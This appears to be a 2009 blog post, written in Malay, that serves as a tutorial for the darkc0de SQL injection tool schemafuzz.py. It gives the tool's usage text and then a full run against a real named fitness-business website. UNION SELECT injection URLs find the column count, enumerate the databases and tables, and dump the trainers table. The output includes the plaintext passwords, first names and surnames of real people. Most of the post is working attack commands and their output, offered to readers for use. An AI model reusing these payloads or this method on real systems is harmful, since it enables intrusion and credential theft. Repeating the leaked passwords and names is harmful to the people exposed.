schemafuzz tutorial

benda ni digunakan untuk MySQL database yang ade error.. atau erti lain nye, sql injection! :)

schemafuzz.py journey… begin…

samurai@AnGry-Milw0rM:~/Desktop$ ./schemafuzz.py -h

Usage: ./schemafuzz.py [options]                          rsauron[@]gmail[dot]com darkc0de.com
Modes:
Define: –dbs          Shows all databases user has access too.                                   MySQL v5+
Define: –schema  Enumerate Information_schema Database.                             MySQL v5+
Define: –full           Enumerates all databases information_schema table          MySQL v5+
Define: –dump      Extract information from a Database, Table and Column.  MySQL v4+
Define: –fuzz         Fuzz Tables and Columns.                                                                  MySQL v4+
Define: –findcol   Finds Columns length of a SQLi                                                       MySQL v4+
Define: –info          Gets MySQL server configuration only.                                      MySQL v4+

Required:
Define: -u        URL “www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4″

Mode dump and schema options:
Define: -D        “database_name”
Define: -T        “table_name”
Define: -C        “column_name,column_name…”

Optional:
Define: -p        “127.0.0.1:80 or proxy.txt”
Define: -o        “ouput_file_name.txt”        Default is schemafuzzlog.txt
Define: -r        row number to start at
Define: -v        Verbosity off option. Will not display row #’s in dump mode.

Ex: ./schemafuzz.py –info -u “www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4″
Ex: ./schemafuzz.py –dbs -u “www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4″
Ex: ./schemafuzz.py –schema -u “www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4″ -D catalog -T orders -r 200
Ex: ./schemafuzz.py –dump -u “www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4″ -D joomla -T jos_users -C username,password
Ex: ./schemafuzz.py –fuzz -u “www.site.com/news.php?id=-1+union+select+1,darkc0de,3,4″ -end “/*” -o sitelog.txt
Ex: ./schemafuzz.py –findcol -u “www.site.com/news.php?id=22″

samurai@AnGry-Milw0rM:~/Desktop$ ./schemafuzz.py –findcol -u http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4–

|—————————————————————|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|—————————————————————|

[+] URL:http://www.rockiurbanfitness.com.au/trainers.php?id=8–
[+] Evasion Used: “+” “–“
[+] 01:58:30
[+] Proxy Not Given
[+] Attempting To find the number of columns…
[+] Testing: 0,1,2,3,4,
[+] Column Length is: 5
[+] Found null column at column #: 0
[+] SQLi URL: http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+0,1,2,3,4–
[+] darkc0de URL: http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4
[-] Done!

samurai@AnGry-Milw0rM:~/Desktop$ ./schemafuzz.py –info -u http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4–

|—————————————————————|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|—————————————————————|

[+] URL:http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4–
[+] Evasion Used: “+” “–“
[+] 01:59:55
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: ruf_http
User: ruf_user@localhost
Version: 5.0.45-community-nt

[+] Do we have Access to MySQL Database: No

[+] Do we have Access to Load_File: No

[-] [01:59:58]
[-] Total URL Requests 3
[-] Done

samurai@AnGry-Milw0rM:~/Desktop$ ./schemafuzz.py –dbs -u http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4–

|—————————————————————|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|—————————————————————|

[+] URL:http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4–
[+] Evasion Used: “+” “–“
[+] 02:00:10
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: ruf_http
User: ruf_user@localhost
Version: 5.0.45-community-nt
[+] Showing all databases current user has access too!
[+] Number of Databases: 2

[0]ruf_http
[1]test

[-] [02:00:16]
[-] Total URL Requests 4
[-] Done

samurai@AnGry-Milw0rM:~/Desktop$ ./schemafuzz.py –schema -D ruf_http -u http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4–

|—————————————————————|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|—————————————————————|

[+] URL:http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4–
[+] Evasion Used: “+” “–“
[+] 02:01:06
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: ruf_http
User: ruf_user@localhost
Version: 5.0.45-community-nt
[+] Showing Tables & Columns from database “ruf_http”
[+] Number of Tables: 6

[Database]: ruf_http
[Table: Columns]
[0]blogs: blogid,title,blog,posted,trainerid
[1]comments: commentid,name,comment,blogid,posted,approved
[2]events: eventid,name,description,date
[3]links: linkid,title,link
[4]testimonials: testimonialid,fname,lname,testimonial
[5]trainers: trainerid,fname,lname,pwd,age,bio

[-] [02:02:12]
[-] Total URL Requests 30
[-] Done

samurai@AnGry-Milw0rM:~/Desktop$ ./schemafuzz.py –dump -D ruf_http -T trainers -C pwd -u http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4–

|—————————————————————|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|—————————————————————|

[+] URL:http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4–
[+] Evasion Used: “+” “–“
[+] 02:04:12
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: ruf_http
User: ruf_user@localhost
Version: 5.0.45-community-nt
[+] Dumping data from database “ruf_http” Table “trainers”
[+] Column(s) [‘pwd’]
[+] Number of Rows: 4

[0] Natalie
[1] glasfryn
[2] ella
[3] attack

[-] [02:04:26]
[-] Total URL Requests 6
[-] Done

samurai@AnGry-Milw0rM:~/Desktop$ ./schemafuzz.py –dump -D ruf_http -T trainers -C fname -u http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4–

|—————————————————————|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|—————————————————————|

[+] URL:http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4–
[+] Evasion Used: “+” “–“
[+] 02:04:43
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: ruf_http
User: ruf_user@localhost
Version: 5.0.45-community-nt
[+] Dumping data from database “ruf_http” Table “trainers”
[+] Column(s) [‘fname’]
[+] Number of Rows: 4

[0] Natalie
[1] Kathryn
[2] Sarah
[3] Craig

[-] [02:04:51]
[-] Total URL Requests 6
[-] Done

samurai@AnGry-Milw0rM:~/Desktop$ ./schemafuzz.py –dump -D ruf_http -T trainers -C lname -u http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4–

|—————————————————————|
| rsauron[@]gmail[dot]com                                v5.0   |
|   6/2008      schemafuzz.py                                   |
|      -MySQL v5+ Information_schema Database Enumeration       |
|      -MySQL v4+ Data Extractor                                |
|      -MySQL v4+ Table & Column Fuzzer                         |
| Usage: schemafuzz.py [options]                                |
|                      -h help                    darkc0de.com  |
|—————————————————————|

[+] URL:http://www.rockiurbanfitness.com.au/trainers.php?id=8+AND+1=2+UNION+SELECT+darkc0de,1,2,3,4–
[+] Evasion Used: “+” “–“
[+] 02:04:59
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration…
Database: ruf_http
User: ruf_user@localhost
Version: 5.0.45-community-nt
[+] Dumping data from database “ruf_http” Table “trainers”
[+] Column(s) [‘lname’]
[+] Number of Rows: 4

[0] Sach
[1] Jones
[2] Stone
[3] O

[-] [02:05:12]
[-] Total URL Requests 6
[-] Done

korang paham x bnd ni?

x susah sgt rase nye bnd ni..

ape2 pn, x paham, blh tny aku.. :)

p/s : thanks to rsauron from darkc0de for this script.. nice one mate ! :)

About these ads

~ by Zam on December 30, 2009.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

 
Follow

Get every new post delivered to your Inbox.

%d bloggers like this: